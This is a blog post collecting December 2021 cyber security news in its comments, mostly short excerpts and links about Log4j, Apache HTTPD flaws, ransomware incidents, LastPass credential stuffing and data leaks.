This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
Dridex Omicron phishing taunts with funeral helpline number https://www.bleepingcomputer.com/news/security/dridex-omicron-phishing-taunts-with-funeral-helpline-number/
Over the past few weeks, one of the Dridex phishing email distributors is having fun toying with victims and researchers. In a new phishing campaign discovered by MalwareHunterTeam and 604Kuzushi, this same threat actor took it to the next level by spamming emails with a subject of “COVID-19 testing result” that states the recipient was exposed to a coworker who tested positive to the Omicron COVID-19 variant.
Tomi Engdahl says:
AvosLocker ransomware reboots in Safe Mode to bypass security tools https://www.bleepingcomputer.com/news/security/avoslocker-ransomware-reboots-in-safe-mode-to-bypass-security-tools/
In recent attacks, the AvosLocker ransomware gang has started focusing on disabling endpoint security solutions that stand in their way by rebooting compromised systems into Windows Safe Mode. This tactic makes it easier to encrypt victims’ files since most security solutions will be automatically disabled after Windows devices boot in Safe Mode.
Tomi Engdahl says:
How I found the Grafana zero-day Path Traversal exploit that gave me access to your logs https://labs.detectify.com/2021/12/15/zero-day-path-traversal-grafana/
On December 2, open-source analytics solution Grafana released an emergency security patch for critical zero-day Path Traversal vulnerability CVE-2021-43798, after proof-of-concept code to exploit the issue was published online. The flaw, which received a 7.5 CVSS score enabling remote access to local files, is no longer exploitable on servers that have the latest Grafana update.
Tomi Engdahl says:
Example of how attackers are trying to push crypto miners via Log4Shell https://isc.sans.edu/forums/diary/Example+of+how+attackers+are+trying+to+push+crypto+miners+via+Log4Shell/28172/
While following Log4Shell’s exploit attempts hitting our honeypots, I came across another campaign trying to push a crypto miner on the victim’s machines. The previous campaign I analyzed used a simple post-exploitation Powershell script to download and launch the coin miner xmrig. The new one uses a.Net launcher to download, decrypt, and execute the binaries.
Tomi Engdahl says:
Personal and salary data for 637, 138 Albanian citizens leaks online https://therecord.media/personal-and-salary-data-for-637138-albanian-citizens-leaks-online/
The Albanian government has confirmed and apologized on Thursday for a data leak that exposed the personal and salary-related information for 637, 138 citizens, more than 22% of the country’s entire population.
Details such as names, ID card numbers, salaries, job positions, and employer names were shared over the weekend on WhatsApp as an Excel document.
Tomi Engdahl says:
Hack DHS’ bug bounty program expands to Log4j security flaws https://www.bleepingcomputer.com/news/security/hack-dhs-bug-bounty-program-expands-to-log4j-security-flaws/
The Department of Homeland Security (DHS) has announced that the ‘Hack DHS’ program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities. The ‘Hack DHS’ bug bounty program was announced last week. It allows vetted cybersecurity researchers to find and report vulnerabilities in external DHS systems, earning rewards of up to $5, 000 per reported bug.
CrowdStrike Launches Free Targeted Log4j Search Tool https://www.crowdstrike.com/blog/free-targeted-log4j-search-tool/
The CrowdStrike Services team has been busy developing a community tool that can be used to quickly scan file systems looking for versions of the Log4j code libraries to help organizations understand what they need to patch in order to mitigate their risk. The free CrowdStrike tool (dubbed the CrowdStrike Archive Scan Tool, or “CAST”) performs a targeted search by scanning a given set of directories for JAR, WAR, ZIP and EAR files, and then it performs a deeper scan on those file types matching against a known set of checksums for Log4j libraries.. We help organizations find any version of the affected Log4j library anywhere on disk, even if it is deeply nested in multiple levels of archive files.
Tomi Engdahl says:
Steam Has Reportedly Been Banned In China
BY STACEY HENLEY
PUBLISHED 2 DAYS AGO
Chinese players are reporting that Steam has been blacklisted.
https://www.thegamer.com/steam-banned-china-christmas-day/
Update 25/12/21 14:07 GMT: Some conflicting reports claim this is the result of a DNS attack and not a deliberate ban. We will update this story as we know more.
Tomi Engdahl says:
Just released v2.0 of LogMePwn — a fully automated #Log4j scanner with custom payloads, CIDR range scanning & multi-protocol support for HTTP, SSH, FTP, IMAP and many more. Checkout the updated release!
https://github.com/0xInfection/LogMePwn
Tomi Engdahl says:
QNAP NAS devices hit in surge of ech0raix ransomware attacks https://www.bleepingcomputer.com/news/security/qnap-nas-devices-hit-in-surge-of-ech0raix-ransomware-attacks/
Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt. The jump in the number of attacks is confirmed by the ID ransomware service, where submissions started to increase on December
19 and subsided towards December 26.
Tomi Engdahl says:
More than 1, 200 phishing toolkits capable of intercepting 2FA detected in the wild https://therecord.media/more-than-1200-phishing-toolkits-capable-of-intercepting-2fa-detected-in-the-wild/
A team of academics said it found more than 1, 200 phishing toolkits deployed in the wild that are capable of intercepting and allowing cybercriminals to bypass two-factor authentication (2FA) security codes. To counter this new trend in account security protections, since at least 2017, threat actors started adopting new tools that would allow them to bypass 2FA by stealing a user’s authentication cookies, which are files created inside a web browser once the user has logged into an account after the 2FA process was completed.
Tomi Engdahl says:
Shutterfly services disrupted by Conti ransomware attack https://www.bleepingcomputer.com/news/security/shutterfly-services-disrupted-by-conti-ransomware-attack/
Photography and personalized photo giant Shutterfly has suffered a Conti ransomware attack that allegedly encrypted thousands of devices and stole corporate data. On Friday, a source told BleepingComputer that Shutterfly suffered a ransomware attack approximately two weeks ago by the Conti gang, who claims to have encrypted over 4, 000 devices and 120 VMware ESXi servers. While BleepingComputer has not seen the negotiations for the attack, we are told that they are underway in progress and that the ransomware gang is demanding millions of dollars as a ransom.
Tomi Engdahl says:
Global Cyberattacks from Nation-State Actors Posing Greater Threats https://threatpost.com/global-cyberattacks-nation-state-threats/177253/
Casey Ellis, CTO at Bugcrowd, outlines how international relations have deteriorated into a new sort of Cold War, with espionage playing out in the cyber-domain.
Tomi Engdahl says:
Ransomware Evolution: From WannaCry to DarkSide
https://medium.com/technology-hits/ransomware-evolution-from-wannacry-to-darkside-1dab07c4d890
2021 is coming to an end. And for cybersecurity, this is a busy year (which wasn’t?). Ransomware attacks are steep upward, and the gradient isn’t softening its progression. Individuals and organizations continue to fall victim to this age-old cybercrime and it’s far from a new phenomenon. If you are not new to the industry, you should remember that the last peak of attention on this issue was in 2017, when the infamous WannaCry ransomware devastated companies. However, comparing what we are facing this year with those in 2017, we saw a giant leap in the business model and the malware themselves.
Tomi Engdahl says:
Ransomware Spotlight: REvil
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil
Now that the reign of REvil has come to an end, it’s time to regroup and strategize. What can organizations learn from REvil’s tactics? We review the rise, downfall, and future of its operations using insights into the group’s arsenal and inner workings. REvil, also known as Sodinokibi, had risen to notoriety for its high-profile attacks since its discovery in 2019. After being among the most active ransomware variants in 2021, it was officially shut down after garnering the attention of law enforcement agencies due to its attacks on critical industries that resulted in supply shortages and delays. The crackdown led to the arrest of two of its associates and its TOR network being taken offline. However, organizations should not let their guard down.
We foresee the group reemerging under a new moniker with the REvil name now tarnished and unlikely to entice affiliates.
Tomi Engdahl says:
Mitä kyberanalyytikko tekee kyberhyökkäyksen aikana? Osallistu avoimeen kyberharjoitukseen ja kokeile!
https://www.epressi.com/tiedotteet/tietoturva/mita-kyberanalyytikko-tekee-kyberhyokkayksen-aikana-osallistu-avoimeen-kyberharjoitukseen-ja-kokeile.html
Jyväskylän ammattikorkeakoulun (Jamk) Euroopan laajuinen Flagship 2
- -kyberharjoitus järjestetään myös avoimena harjoituksena, jossa kybertuvallisuudesta kiinnostuneet pääsevät kyberanalyytikoksi keskelle simuloitua kyberhyökkäystä. Jyväskylän ammattikorkeakoulu järjestää tammikuussa kyberturvallisuusharjoituksen, johon odotetaan osallistujia 22 Euroopan maasta. Osallistujien tehtävänä on löytää merkkejä uhkatoiminnasta ja teknisesti tutkia tapahtunutta kyberhyökkäystä, sekä pohtia sen vaikutusta organisaation ydintoimintaan. Harjoitukseen voivat osallistua ensimmäistä kertaa myös hanketoiminnan ulkopuoliset henkilöt.
Tomi Engdahl says:
Asset Visibility Maps Relationships and Communication Pathways in OT Environments https://www.dragos.com/blog/industry-news/asset-visibility-maps-relationships-and-communication-pathways-in-ot-environments/
Experienced cybersecurity professionals will tell you that you can’t secure the systems you don’t know about, which is why asset visibility is so crucial no matter what kind of technology infrastructure you’re defending. Asset visibility in industrial control system (ICS) environments provides industrial asset owners and operators and security staff with the knowledge and insight necessary to build a mature operational technology (OT) cybersecurity program. When organizations can get accurate and timely views into the assets running on their industrial networks, the benefits are cascading.
Tomi Engdahl says:
In 2022, security will be Linux and open-source developers job number one https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
Tomi Engdahl says:
Critical Apache HTTPD Server Bugs Could Lead to RCE, DoS
https://threatpost.com/apache-httpd-server-bugs-rce-dos/177234/
Don’t freak: It’s got nothing to do with Log4Shell, except it may be just as far-reaching as Log4j, given HTTPD’s tendency to tiptoe into software projects.
Don’t duck at the latest mention of Apache: Two critical bugs in its HTTP web server – HTTPD – need to be patched pronto, lest they lead to attackers triggering denial of service (DoS) or bypassing your security policies.
Both vulnerabilities are found in Apache HTTP Server 2.4.51 and earlier.
The first issue (CVE-2021-44790) is with the function “r:parsebody” of the component “mod_lua Multipart Parser.” As the VulDB vulnerability database describes it, “manipulation with an unknown input leads to a memory-corruption vulnerability” that “is going to have an impact on confidentiality, integrity and availability.”
VulDB also noted that the issue is reportedly easy to exploit: It is possible to launch the attack remotely. The exploitation doesn’t require any form of authentication.”
In a Tuesday writeup of the two CVEs, Sophos principal security researcher Paul Ducklin said that the two bugs could leave servers at risk of some serious hurt.
“These bugs might not be exposed in your configuration, because they are part of optional run-time modules that you might not actually be using,” Ducklin noted. “But if you are using these modules, whether you realize it or not, you could be at risk of server crashes, data leakage or even remote code execution.”
On Monday, Apache published these details for the two CVEs in its changelog:
CVE-2021-44790: Possible buffer overflow when parsing a carefully crafted request in the mod_lua multipart parser of Apache HTTP Server 2.4.51 and earlier. Apache said that its HTTPD team hasn’t seen an exploit, but “it might be possible to craft one.”
CVE-2021-44224: Possible NULL dereference or Server Side Request Forgery (SSRF) in forward proxy configurations, likewise in Apache HTTP Server 2.4.51 and earlier.
Sean Nikkel, senior cyber-threat intel analyst at Digital Shadows, noted that a quick peek at the Shodan search engine reveals that there more than 3 million public devices running some version of HTTPD as of this writing, meaning there’s a chance that HTTPD is running on some internal or otherwise non-public instances.
Schless urged IT teams to address the CVEs immediately, prioritizing anything that’s publicly accessible or web-facing. “These assets are the ones that attackers will scan for in order to find vulnerable systems and exploit the vulnerability,” he said.
After that, security teams should then move on to assessing and addressing internal servers and applications to which only employees have access, he added.
Tomi Engdahl says:
High-Risk Flaw Haunts Apache Server
https://www.securityweek.com/high-risk-flaw-haunts-apache-server
The Apache Software Foundation has released a new version of its flagship web server to patch a pair of security defects, one serious enough to lead to remote code execution attacks.
The Apache HTTP Server 2.4.52 is listed as urgent and the U.S. government’s security response agency CISA is calling on users of the open-source cross-platform web server software to “update as soon as possible.”
The patch provides cover for two documented security vulnerabilities — CVE-2021-44790 and CVE-2021-44224 — one of which may allow a remote attacker to take control of an affected system.
From the Apache Software Foundation advisory:
HIGH: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51 and earlier (CVE-2021-44790)
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).
The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one.
The open-source group also documented CVE-2021-44224, a “moderate-risk” NULL dereference or SSRF in forward proxy configurations in Apache HTTP Server 2.4.51 and earlier.
Tomi Engdahl says:
IT Services Firm Inetum Discloses Ransomware Attack
https://www.securityweek.com/it-services-firm-inetum-discloses-ransomware-attack
French IT services company Inetum Group revealed just before Christmas that it had fallen victim to a ransomware attack, but claimed that impact on its operations was limited.
Inetum, which operates in 26 countries and has roughly 27,000 employees worldwide, said the attack took place on December 19. The company said it acted quickly, isolating the affected “operational sites,” including networks and services.
https://www.inetum.com/en/press/cyberattack-inetum-france
Tomi Engdahl says:
Jackson Public Schools Ups Cybersecurity After Hacker Attack
https://www.securityweek.com/jackson-public-schools-ups-cybersecurity-after-hacker-attack
The public school district in Mississippi’s capital city is implementing new cybersecurity measures after hackers attacked its server last year.
Tomi Engdahl says:
Organizations Targeted With Babuk-Based Rook Ransomware
https://www.securityweek.com/organizations-targeted-babuk-based-rook-ransomware
A piece of ransomware that emerged in late November has already made three victims, with the first of them hit less than a week after the malware was initially spotted.
Dubbed Rook, the ransomware shows numerous similarities with Babuk, and security researchers have discovered that it was in fact built using Babuk code that was leaked online earlier this year.
Rook was initially seen on VirusTotal on November 26, and its first victim – a Kazakh financial institution – was identified on November 30. In addition to encrypting the organization’s files, the Rook gang stole roughly 1 terabyte of data, to use it for extortion.
Tomi Engdahl says:
New Flaws Expose EVlink Electric Vehicle Charging Stations to Remote Hacking
https://www.securityweek.com/new-flaws-expose-evlink-electric-vehicle-charging-stations-remote-hacking
Schneider Electric has patched several new vulnerabilities that expose its EVlink electric vehicle charging stations to remote hacker attacks.
Schneider announced the availability of patches on December 14, when it urged customers to immediately apply patches or mitigations. The flaws have been found to impact EVlink City (EVC1S22P4 and EVC1S7P4), Parking (EVW2, EVF2 and EVP2PE) and Smart Wallbox (EVB1A) devices, as well as some products that have reached end of life.
The vendor has credited researcher Tony Nasr for finding a total of seven vulnerabilities in these charging stations, including one critical and five high-severity issues.
The security holes include cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs that can be exploited to carry out actions on behalf of a legitimate user, and a weakness that can be leveraged to gain access to a charging station’s web interface via brute-force attacks. The most serious issue — based on its CVSS score of 9.3 — is a server-side request forgery (SSRF) vulnerability.
Tomi Engdahl says:
Albanian Prime Minister Apologizes Over Database Leak
https://www.securityweek.com/albanian-prime-minister-apologizes-over-database-leak
Albania’s prime minister on Thursday apologized for a big leak of personal records from a government database of state and private employees, which he said seems more like an inside job than a cyber attack.
A file containing the personal identity card numbers, employment and salary data of some 637,000 people became public this week and was widely shared through messaging apps.
Prime Minister Edi Rama said the leak is being investigated.
“According to a preliminary analysis, it looks more like an internal infiltration rather than an outside … cyber-attack,” Rama told a press conference.
Tomi Engdahl says:
NVIDIA, HPE Products Affected by Log4j Vulnerabilities
https://www.securityweek.com/nvidia-hpe-products-affected-log4j-vulnerabilities
NVIDIA and Hewlett Packard Enterprise (HPE) have confirmed that some of their products are affected by the recently disclosed vulnerabilities in the Apache Log4j logging utility.
A total of three vulnerabilities were identified in the utility – namely CVE-2021-44228 (aka Log4Shell), CVE-2021-45046 and CVE‑2021‑45105 – and at least two of them have been exploited in malicious attacks.
Shortly after the issues became public, NVIDIA and HPE started investigating which of their products are affected, and both of them already released patches and mitigations to resolve the bugs or prevent potential exploitation attempts.
In an advisory updated on Wednesday, NVIDIA confirmed that the Log4j security defects affect CUDA Toolkit Visual Profiler and Nsight Eclipse Edition, NetQ, and vGPU Software License Server.
Security Notice: NVIDIA Response to Log4j Vulnerabilities – December 2021
https://nvidia.custhelp.com/app/answers/detail/a_id/5294
HPE, on the other hand, says that some of its products are also affected by CVE-2021-4104, a deserialization of untrusted data vulnerability that can be triggered by an attacker with access to the Log4j configuration and which results in remote code execution (only Log4j 1.2 configured to use JMSAppender is affected).
The company has identified roughly 60 products that use the vulnerable library and has already published security notices (including patches and mitigations) and security bulletins for them.
HPESBGN04215 rev.8 – Certain HPE Products using Apache Log4j, Remote Arbitrary Code Execution, Remote Code Execution, and Remote Denial of Service
https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04215en_us
Tomi Engdahl says:
Several Critical Vulnerabilities Found in myPRO HMI/SCADA Product
https://www.securityweek.com/several-critical-vulnerabilities-found-mypro-hmiscada-product
A researcher has found a dozen vulnerabilities in the myPRO product of Czech industrial automation company mySCADA, including several flaws that have been assigned a critical severity rating.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued two advisories to inform organizations about these vulnerabilities — one advisory was released in August and one on December 21.
The researcher who discovered the security holes, Michael Heinzl, has also made available advisories describing each issue.
https://awesec.com/advisories.html
Tomi Engdahl says:
Microsoft Office Patch Bypassed for Malware Distribution in Apparent ‘Dry Run’
https://www.securityweek.com/microsoft-office-patch-bypassed-malware-distribution-apparent-dry-run
Cybercriminals have found a way to bypass the patch for a recent Microsoft Office vulnerability and leveraged it to briefly distribute Formbook malware, Sophos reports.
Tracked as CVE-2021-40444 (CVSS score of 8.8), and affecting the MSHTML file format, the security defect can be exploited to achieve remote code execution on vulnerable systems. An attacker looking to exploit the bug needs to trick the indented victim into opening a maliciously crafted document.
Publicly disclosed on September 7, after attacks exploiting it were identified, the security error was addressed with the September 2021 Patch Tuesday updates. Proof-of-concept code targeting the bug was also published and exploitation activity intensified.
Tomi Engdahl says:
Five Eyes Nations Issue Joint Guidance on Log4j Vulnerabilities
https://www.securityweek.com/five-eyes-nations-issue-joint-guidance-log4j-vulnerabilities
Government agencies in the United States, Canada, the United Kingdom, Australia and New Zealand on Wednesday announced the release of a joint cybersecurity advisory to provide guidance on addressing the recently disclosed vulnerabilities affecting the widely used Log4j logging utility.
Governments around the world have been warning organizations about the risks posed by the recent Log4j vulnerabilities, at least two of which — CVE-2021-44228 (aka Log4Shell) and CVE-2021-45046 — have been exploited in attacks.
Both cybercriminals and state-sponsored threat actors have targeted Log4j in their recent attacks, but the Belgian military appears to be the only government organization that has confirmed being hit to date.
Tomi Engdahl says:
400,000 Individuals Affected by Email Breach at West Virginia Healthcare Company
https://www.securityweek.com/400000-individuals-affected-email-breach-west-virginia-healthcare-company
Monongalia Health System (Mon Health) this week disclosed a business email compromise (BEC) incident that was the result of unauthorized access to its email system.
Mon Health says it became aware of the intrusion on July 28, when a vendor notified it of a payment that had not come through. An investigation launched into the matter revealed that adversaries likely had unauthorized access to the email system between May 10 and August 15, 2021.
As part of the incident, cybercriminals compromised a Mon Health contractor’s email account and used it to send messages in an attempt to obtain funds through fraudulent wire transfers.
Tomi Engdahl says:
LastPass users warned their master passwords are compromised
https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/?fbclid=IwAR2tvT-oC6FXEtfDpAd1MZxbJZuShR-pE4h9Mg4J-xmuXudtgnbuTepZc7M
Tomi Engdahl says:
LastPass master passwords may have been compromised
https://appleinsider.com/articles/21/12/28/lastpass-master-passwords-may-have-been-compromised
LastPass members have reported multiple attempted logins using correct master passwords from various locations, but the company says that the recent attacks are a result of shared passwords gleaned from breaches of other services.
Multiple users in a Hacker News forum have shared that their master passwords for LastPass appear to be compromised. It is unknown how the passwords have leaked out, but a pattern has emerged amongst users.
The majority of reports appear to come from users with outdated LastPass accounts, meaning they haven’t used the service in some time and haven’t changed the password. This indicates the master password list being used may have come from an earlier hack.
“LastPass investigated recent reports of blocked login attempts and we believe the activity is related to attempted ‘credential stuffing’ activity, in which a malicious or bad actor attempts to access user accounts (in this case, LastPass) using email addresses and passwords obtained from third-party breaches related to other unaffiliated services,”
We can confirm that there is some kind of organized effort to break into LassPass vaults. Since publication, we’ve had confirmation from readers and colleagues all over the globe about login attempts.
AppleInsider recommends that users change their passwords, enable two-factor authentication, and keep an eye out for suspicious login attempts. There is also the option of removing passwords from the service and migrating to 1Password or Apple’s iCloud Keychain.
LastPass is a free password manager available across desktop and mobile devices.
Tomi Engdahl says:
Cyberattack on one of Norway’s largest media companies shuts down presses
https://therecord.media/cyberattack-on-one-of-norways-largest-media-companies-shuts-down-presses/
Amedia, the largest local news publisher in Norway, announced on Tuesday that several of its central computer systems were shut down in what it is calling an apparent “serious” cyberattack. The attack is preventing the company from printing Wednesday’s edition of physical newspapers, and presses will continue to be halted until the issue is resolved, Amedia executive vice president of technology Pål Nedregotten said in a statement. The company said it is unclear whether personal information has been compromisedthe subscription system affected by the attack contains names, addresses, phone numbers, and subscription history of customers. Data such as passwords, read history, and financial information are not affected, the company said.
Tomi Engdahl says:
Log4j 2.17.1 out now, fixes new remote code execution bug
https://www.bleepingcomputer.com/news/security/log4j-2171-out-now-fixes-new-remote-code-execution-bug/
Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Rated ‘Moderate’ in severity and assigned a
6.6 score on the CVSS scale, the vulnerability stems from the lack of additional controls on JDNI access in log4j. “Related to
CVE-2021-44832 where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.”
Tomi Engdahl says:
New Flagpro malware linked to Chinese state-backed hackers
https://www.bleepingcomputer.com/news/security/new-flagpro-malware-linked-to-chinese-state-backed-hackers/
BlackTech cyber-espionage APT (advanced persistent threat) group has been spotted targeting Japanese companies using novel malware that researchers call Flagpro’. The threat actor uses Flagpro in the initial stage of an attack for network reconnaissance, to evaluate the target’s environment, and to download second-stage malware and execute it.
Tomi Engdahl says:
LastPass users warned their master passwords are compromised
https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried to use them to log into their accounts from unknown locations. The email notifications also mention that the login attempts have been blocked because they were made from unfamiliar locations worldwide.
Tomi Engdahl says:
RedLine malware shows why passwords shouldn’t be saved in browsers
https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/
The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea. This malware is a commodity information-stealer that can be purchased for roughly $200 on cyber-crime forums and be deployed without requiring much knowledge or effort. In an example presented by the analysts, a remote employee lost VPN account credentials to RedLine Stealer actors who used the information to hack the company’s network three months later.
Tomi Engdahl says:
Researchers Dive Into Equation Group Tool ‘DoubleFeature’
https://www.securityweek.com/researchers-dive-equation-group-tool-doublefeature
Tomi Engdahl says:
Shutterfly Says Ransomware Attack Impacted Manufacturing
https://www.securityweek.com/shutterfly-says-ransomware-attack-impacted-manufacturing
Shutterfly, an online platform for photography and personalized products, has confirmed that some of its services have been affected by a ransomware attack.
Operating multiple services and brands – such as BorrowLenses, GrooveBook, Lifetouch, Shutterfly, Snapfish, Spoonflower, and Tiny Prints – the online retail and manufacturing platform helps users create products such as a cards, gifts, home décor, invitations, photo books, and more.
The recent ransomware attack, the company told SecurityWeek in an emailed statement, impacted parts of its network, including manufacturing and corporate systems.
Tomi Engdahl says:
IT Services Firm Inetum Discloses Ransomware Attack
https://www.securityweek.com/it-services-firm-inetum-discloses-ransomware-attack
Tomi Engdahl says:
High-Risk Flaw Haunts Apache Server
https://www.securityweek.com/high-risk-flaw-haunts-apache-server
The Apache Software Foundation has released a new version of its flagship web server to patch a pair of security defects, one serious enough to lead to remote code execution attacks.
The Apache HTTP Server 2.4.52 is listed as urgent and the U.S. government’s security response agency CISA is calling on users of the open-source cross-platform web server software to “update as soon as possible.”
The patch provides cover for two documented security vulnerabilities — CVE-2021-44790 and CVE-2021-44224 — one of which may allow a remote attacker to take control of an affected system.
From the Apache Software Foundation advisory:
HIGH: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51 and earlier (CVE-2021-44790)
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts).
The Apache httpd team is not aware of an exploit for the vulnerability though it might be possible to craft one.
Tomi Engdahl says:
Sergiu Gatlan / BleepingComputer:
Some LastPass users say their master passwords were compromised and used in blocked login attempts from unknown IPs; LastPass blames “credential stuffing” — Many LastPass users report that their master passwords have been compromised after receiving email warnings that someone tried …
LastPass users warned their master passwords are compromised
https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
Tomi Engdahl says:
Mariam Baksh / Nextgov:
Biden signs the annual defense bill codifying voluntary cybersecurity frameworks for the private sector, which operates the bulk of US’s critical infrastructure
Biden Signs NDAA Relying on Voluntary Private-Sector Cybersecurity Collaboration
https://www.nextgov.com/cybersecurity/2021/12/biden-signs-ndaa-relying-voluntary-private-sector-cybersecurity-collaboration/360217/
Major breaches over the past year were a double-edged sword in efforts to pass a crucial mandatory reporting measure that didn’t make it into the ‘must-pass’ legislation despite bipartisan support, according to key lawmakers.
President Joe Biden on Monday signed into law the National Defense Authorization Act of 2022 which codifies an approach to cybersecurity that depends on the decisions of private-sector entities to protect the bulk of the nation’s critical infrastructure.
The NDAA has become the go-to legislative vehicle for efforts to manage the federal government at large, and to regulate the private sector on cybersecurity issues.
On the government side, the law requires the Cybersecurity and Infrastructure Security Agency to biennially update an incident response plan and to consult with sector-specific agencies and the private sector in establishing an exercise program to assess its effectiveness.
It seeks to “ensure that the National Guard can provide cyber support services to critical infrastructure entities—including local governments and businesses,” according to Sen. Maggie Hassan, D-N.H. It also establishes a grant program at the Homeland Security Department to foster collaboration on cybersecurity technologies between public and private-sector entities in the U.S. and Israel.
Lawmakers also highlighted the inclusion of provisions codifying existing public-private partnerships at CISA which aim to offer continuous monitoring of industrial control systems—an effort known as the CyberSentry program—and to develop ‘know your customer’ guidelines for companies like cloud and other service providers comprising the “internet ecosystem.” Such companies are described as the plank bearers of CISA’s Joint Cyber Defense Collaborative.
Tomi Engdahl says:
FBI Confirms Zodiac Killer’s Infamous 340 Cipher Has Been Decoded, And His Message Finally Revealed
https://www.iflscience.com/editors-blog/fbi-confirms-zodiac-killers-infamous-340-cipher-has-been-decoded-and-his-message-finally-revealed/?fbclid=IwAR0EQ0MP19vSxaaK4RPrNdMfQXhaW4ifQ_SNTGyJL–uXIxmfvaeBad8Gi4
The FBI have confirmed that a group of codebreakers have managed to crack the infamous 340 cipher used by the Zodiac Killer over 50 years ago.
In the late 1960s, heading into the early 1970s, a serial killer going by the pseudonym “Zodiac” murdered at least five people in California. During his spree, the killer sent taunting messages to the press written through a cipher, where letters are substituted for different letters or numbers (or in the case of the Zodiac killer, a series of symbols).
Tomi Engdahl says:
Threat Actors Abuse MSBuild for Cobalt Strike Beacon Execution
https://www.securityweek.com/threat-actors-abuse-msbuild-cobalt-strike-beacon-execution
Recently observed malicious campaigns have abused Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines.
Designed for the creation of applications on Windows, MSBuild uses a project file element called ‘Tasks’ to designate components that are executed during project building, and threat actors are abusing these Tasks to run malicious code disguised as MSBuild.
Over the past week, Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler Renato Marinho says, two different malicious campaigns were observed abusing MSBuild for code execution.
The threat actors typically gain access to the target environment using a valid remote desktop protocol (RDP) account, leverage remote Windows Services (SCM) for lateral movement, and abuse MSBuild to execute the Cobalt Strike Beacon payload.
The malicious MSBuild project was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike.
Attackers are abusing MSBuild to evade defenses and implant Cobalt Strike beacons
https://isc.sans.edu/diary/rss/28180
Microsoft Build Engine is the platform for building applications on Windows, mainly used in environments where Visual Studio is not installed. Also known as MSBuild, the engine provides an XML schema for a project file that controls how the build platform processes and builds software [1]. The project file element named ‘Tasks’ designates independent executable components to run during the project building. Tasks are meant to perform build operations but are being abused by attackers to run malicious code under the MSBuild disguise. The technique is mapped on Mitre ATT&CK as “Trusted Developer Utilities Proxy Execution” – T1127.001.
This is the second malicious campaign I got using MSBuild in less than a week. Usually, it starts with an RDP access using a valid account, spreads over the network via remote Windows Services (SCM), and pushes Cobalt Strike beacon to corporate hosts abusing the MSBuild task feature as described in today’s diary.
Tomi Engdahl says:
RedLine malware shows why passwords shouldn’t be saved in browsers
https://www.bleepingcomputer.com/news/security/redline-malware-shows-why-passwords-shouldnt-be-saved-in-browsers/
The RedLine information-stealing malware targets popular web browsers such as Chrome, Edge, and Opera, demonstrating why storing your passwords in browsers is a bad idea.
This malware is a commodity information-stealer that can be purchased for roughly $200 on cyber-crime forums and be deployed without requiring much knowledge or effort.
Even though the infected computer had an anti-malware solution installed, it failed to detect and remove RedLine Stealer.
The malware targets the ‘Login Data’ file found on all Chromium-based web browsers and is an SQLite database where usernames and passwords are saved.
Tomi Engdahl says:
Threat actor uses HP iLO rootkit to wipe servers https://therecord.media/threat-actor-uses-hp-ilo-rootkit-to-wipe-servers/
An Iranian cyber-security firm said it discovered a first-of-its-kind rootkit that hides inside the firmware of HP iLO devices and which has been used in real-world attacks to wipe servers of Iranian organizations. Named iLOBleed, the rootkit was discovered by Tehran-based security firm Amnpardaz and detailed in a report released on Tuesday. According to the company, iLOBleed targets HP iLO (Integrated Lights-Out), a hardware device that can be added to servers or workstations as an add-on board.
Tomi Engdahl says:
Microsoft Defender Log4j scanner triggers false positive alerts https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-log4j-scanner-triggers-false-positive-alerts/
Microsoft Defender for Endpoint is currently showing “sensor tampering” alerts linked to the company’s newly deployed Microsoft 365 Defender scanner for Log4j processes. The alerts are reportedly mainly shown on Windows Server 2016 systems and warn of “possible sensor tampering in memory was detected by Microsoft Defender for Endpoint”
created by an OpenHandleCollector.exe process.
Tomi Engdahl says:
AvosLocker ransomware gives free decryptor to US police dept https://www.bleepingcomputer.com/news/security/avoslocker-ransomware-gives-free-decryptor-to-us-police-dept/
The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency. Last month, a US police department was breached by AvosLocker, who encrypted devices and stole data during the attack. However, according to a screenshot shared by security researcher pancak3, after learning that the victim was a government agency, they provided a decryptor for free.
Tomi Engdahl says:
LastPass Automated Warnings Linked to ‘Credential Stuffing’ Attack
